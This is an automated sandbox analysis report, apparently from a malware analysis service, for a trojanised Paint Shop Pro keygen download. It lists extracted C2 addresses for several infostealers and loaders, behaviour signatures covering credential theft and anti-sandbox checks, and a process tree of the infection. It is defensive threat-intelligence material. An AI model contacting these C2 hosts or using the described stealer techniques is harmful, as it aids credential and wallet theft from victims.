Resubmissions

22-04-2021 16:45

210422-k9xv9nxcbx 10

21-04-2021 17:01

210421-pl1rqeqs7n 10

21-04-2021 12:53

210421-gkr26l4mvs 10

20-04-2021 19:55

210420-nex8ep6zhj 10

20-04-2021 15:03

210420-v63pp18knj 10

Analysis

  • max time kernel
    1801s
  • max time network
    1798s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    20-04-2021 15:03

General

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Extracted

Family

smokeloader

Version

2020

C2

http://venosur.top/

http://nabudar.top/

rc4.i32
rc4.i32

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 49 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 48 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 50 IoCs
  • Modifies data under HKEY_USERS 29 IoCs
  • Modifies registry class 26 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • NTFS ADS 3 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 20 IoCs
  • Suspicious use of SetWindowsHookEx 26 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:468
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:860
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {0C7D7122-9AC7-4AA3-A314-A807381D52B2} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
          3⤵
            PID:3560
            • C:\Users\Admin\AppData\Roaming\hfbieuv
              C:\Users\Admin\AppData\Roaming\hfbieuv
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:3464
              • C:\Users\Admin\AppData\Roaming\hfbieuv
                "C:\Users\Admin\AppData\Roaming\hfbieuv"
                5⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:4064
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {F44F8F5B-4D20-41C4-8F63-EC375D1A5A34} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
            3⤵
              PID:3604
              • C:\Users\Admin\AppData\Roaming\hfbieuv
                C:\Users\Admin\AppData\Roaming\hfbieuv
                4⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:2348
                • C:\Users\Admin\AppData\Roaming\hfbieuv
                  "C:\Users\Admin\AppData\Roaming\hfbieuv"
                  5⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:2044
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k SystemNetworkService
            2⤵
            • Checks processor information in registry
            • Modifies data under HKEY_USERS
            • Modifies registry class
            PID:1628
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k SystemNetworkService
            2⤵
            • Drops file in System32 directory
            • Checks processor information in registry
            • Modifies data under HKEY_USERS
            • Modifies registry class
            PID:3632
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/8550ceeb125094q2480.html
          1⤵
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:1684
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fef6a84f50,0x7fef6a84f60,0x7fef6a84f70
            2⤵
              PID:1424
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1132 /prefetch:2
              2⤵
                PID:1764
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1252 /prefetch:8
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:1776
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1832 /prefetch:8
                2⤵
                  PID:1552
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2080 /prefetch:1
                  2⤵
                    PID:1708
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2068 /prefetch:1
                    2⤵
                      PID:1504
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2452 /prefetch:1
                      2⤵
                        PID:240
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2408 /prefetch:1
                        2⤵
                          PID:748
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2528 /prefetch:1
                          2⤵
                            PID:940
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2460 /prefetch:1
                            2⤵
                              PID:956
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3516 /prefetch:8
                              2⤵
                                PID:2240
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4104 /prefetch:2
                                2⤵
                                  PID:2372
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4948 /prefetch:8
                                  2⤵
                                    PID:2632
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8
                                    2⤵
                                      PID:2688
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1560 /prefetch:8
                                      2⤵
                                        PID:2736
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8
                                        2⤵
                                          PID:2784
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3128 /prefetch:8
                                          2⤵
                                            PID:2832
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:8
                                            2⤵
                                              PID:2880
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:8
                                              2⤵
                                                PID:2928
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3172 /prefetch:8
                                                2⤵
                                                  PID:2976
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3176 /prefetch:8
                                                  2⤵
                                                    PID:3024
                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                    2⤵
                                                      PID:3044
                                                      • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                        "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x13c,0x140,0x144,0x110,0x148,0x13f4ea890,0x13f4ea8a0,0x13f4ea8b0
                                                        3⤵
                                                          PID:2212
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4824 /prefetch:8
                                                        2⤵
                                                          PID:2156
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4868 /prefetch:8
                                                          2⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:892
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4908 /prefetch:8
                                                          2⤵
                                                            PID:1800
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4904 /prefetch:8
                                                            2⤵
                                                              PID:932
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4796 /prefetch:8
                                                              2⤵
                                                                PID:2032
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4912 /prefetch:8
                                                                2⤵
                                                                  PID:1896
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4816 /prefetch:8
                                                                  2⤵
                                                                    PID:1220
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4664 /prefetch:8
                                                                    2⤵
                                                                      PID:2108
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4900 /prefetch:8
                                                                      2⤵
                                                                        PID:784
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4460 /prefetch:8
                                                                        2⤵
                                                                          PID:2756
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4680 /prefetch:8
                                                                          2⤵
                                                                            PID:2752
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4308 /prefetch:8
                                                                            2⤵
                                                                              PID:2856
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4336 /prefetch:8
                                                                              2⤵
                                                                                PID:2864
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4100 /prefetch:8
                                                                                2⤵
                                                                                  PID:2908
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8
                                                                                  2⤵
                                                                                    PID:2944
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3120 /prefetch:8
                                                                                    2⤵
                                                                                      PID:2948
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3780 /prefetch:8
                                                                                      2⤵
                                                                                        PID:2884
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5472 /prefetch:8
                                                                                        2⤵
                                                                                          PID:2956
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4780 /prefetch:8
                                                                                          2⤵
                                                                                            PID:1768
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5564 /prefetch:8
                                                                                            2⤵
                                                                                              PID:1320
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2688 /prefetch:8
                                                                                              2⤵
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:2992
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4712 /prefetch:8
                                                                                              2⤵
                                                                                                PID:2276
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4520 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:588
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2636 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:2728
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4416 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:2112
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4264 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:1288
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5528 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:536
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4344 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:948
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2564 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:2084
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1736 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:1660
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:1220
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1120,9488455351444232529,12715135524384520801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=536 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:3336
                                                                                                                • C:\Windows\system32\AUDIODG.EXE
                                                                                                                  C:\Windows\system32\AUDIODG.EXE 0x4f0
                                                                                                                  1⤵
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:2968
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp2_Jasc_Paint_Shop_Pro_9_0_serial_key_gen_by_TSRh.zip\Jasc_Paint_Shop_Pro_9_0_serial_key_gen_by_TSRh.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Temp2_Jasc_Paint_Shop_Pro_9_0_serial_key_gen_by_TSRh.zip\Jasc_Paint_Shop_Pro_9_0_serial_key_gen_by_TSRh.exe"
                                                                                                                  1⤵
                                                                                                                    PID:1868
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                      2⤵
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:2756
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                        keygen-pr.exe -p83fsase3Ge
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
